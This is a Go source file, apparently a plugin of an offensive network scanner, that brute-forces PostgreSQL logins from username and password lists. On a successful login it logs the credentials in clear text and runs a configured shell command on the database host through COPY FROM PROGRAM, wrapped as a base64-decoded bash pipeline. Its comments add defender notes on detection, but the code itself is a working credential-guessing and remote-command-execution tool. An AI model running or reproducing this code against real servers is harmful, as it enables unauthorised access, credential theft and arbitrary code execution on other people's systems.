package plugins
import (
"context"
"database/sql"
"encoding/base64"
"errors"
"fmt"
"log"
"strings"
"time"
"github.com/404tk/lazyscan/common"
_ "github.com/lib/pq"
)
// PostgreScan tries every username/password pair in info against the host's
// PostgreSQL service and returns as soon as one pair authenticates.
//
// The literal "{user}" inside a password is replaced with the current
// username before each attempt. The loop is bounded by a single overall time
// budget rather than a per-attempt one: once the elapsed wall-clock seconds
// exceed len(Usernames)*len(Passwords) multiplied by info.Timeout, it gives
// up with a "timeout." error.
//
// Returns the error value from the successful PostgresConn call (nil when the
// login worked), the timeout error, or nil once every pair was rejected. The
// error from each rejected attempt is discarded, so a host that is down and a
// wrong password look the same to the caller.
//
// From a defender's view the observable pattern is a burst of short-lived
// connections from one source cycling through usernames; PostgreSQL's
// authentication-failure log lines and connection rate limiting are the
// straightforward detections.
func PostgreScan(info *common.HostInfo) error {
	starttime := time.Now().Unix()
	for _, user := range info.Usernames {
		for _, pass := range info.Passwords {
			// Expand the "{user}" placeholder so password lists can reference the username.
			pass = strings.Replace(pass, "{user}", string(user), -1)
			flag, err := PostgresConn(info, user, pass)
			if flag == true {
				// First successful login ends the scan; err is whatever PostgresConn reported.
				return err
			} else {
				// Whole-scan budget in seconds: (number of pairs) * info.Timeout.
				if time.Now().Unix()-starttime > (int64(len(info.Usernames)*len(info.Passwords)) * info.Timeout) {
					return errors.New("timeout.")
				}
			}
		}
	}
	return nil
}
// PostgresConn attempts one PostgreSQL login as user/pass against
// info.Host:info.Port, targeting the "postgres" database with sslmode=disable
// (the credentials therefore travel in clear text on the wire).
//
// sql.Open only validates the DSN; the network round-trip and authentication
// happen in db.Ping. On success the function writes the credential pair in
// plain text to the standard logger, pushes a common.Vuln onto info.Queue when
// one is configured, and — if info.Command.TCPCommand is non-empty — passes
// that command to PostgreExec wrapped as a base64-decoding bash pipeline.
//
// Returns flag=true only when Ping succeeded; err carries whatever sql.Open
// or Ping reported (nil on success). The DSN is assembled with fmt.Sprintf
// and user/pass are not URL-escaped, so values containing URL-reserved
// characters are not represented faithfully in the connection string.
func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", user, pass, info.Host, info.Port, "postgres", "disable")
	db, err := sql.Open("postgres", dataSourceName)
	if err == nil {
		// Pool connection lifetime, not a dial or Ping deadline: no connect
		// timeout is configured here.
		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
		defer db.Close()
		// Ping performs the actual connect + authentication.
		err = db.Ping()
		if err == nil {
			// Credential pair is logged in clear text; treat the log output as sensitive.
			result := fmt.Sprintf("[%s:%s] Postgres credential %s/%s", info.Host, info.Port, user, pass)
			log.Println(result)
			if info.Queue != nil {
				vuln := common.Vuln{
					Host: info.Host,
					Port: info.Port,
					User: user,
					Pass: pass,
				}
				info.Queue.Push(vuln)
			}
			cmd := info.Command.TCPCommand
			if cmd != "" {
				// Command is base64-wrapped, presumably so it can be embedded in
				// the SQL literal PostgreExec builds without quoting issues — TODO confirm.
				b64 := base64.StdEncoding.EncodeToString([]byte(cmd))
				cmd = fmt.Sprintf("echo %s | base64 -d | bash", b64)
				PostgreExec(db, cmd)
			}
			flag = true
		}
	}
	return flag, err
}
// PostgreExec asks the PostgreSQL server to run cmd on its own host through
// COPY ... FROM PROGRAM, under a 3-second context deadline.
//
// The statement string drops and recreates a table named cmd_exec, runs cmd
// via COPY FROM PROGRAM into it, then selects from it. Both the result and
// the error of ExecContext are discarded, so the caller learns nothing about
// whether the command ran, and the SELECT output is never read. cmd is
// spliced into a single-quoted SQL literal with fmt.Sprintf without escaping.
//
// Defender notes: COPY FROM PROGRAM is only allowed for superusers or members
// of pg_execute_server_program, so this step succeeds only against an
// over-privileged account. The leftover cmd_exec table and the COPY statement
// itself in statement/audit logging (log_statement, pgaudit) are reliable
// indicators of this technique.
func PostgreExec(db *sql.DB, cmd string) {
	ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
	defer cancel()
	query := fmt.Sprintf("DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM '%s';SELECT * FROM cmd_exec", cmd)
	// Error deliberately unchecked by the original author; failures are silent.
	db.ExecContext(ctx, query)
}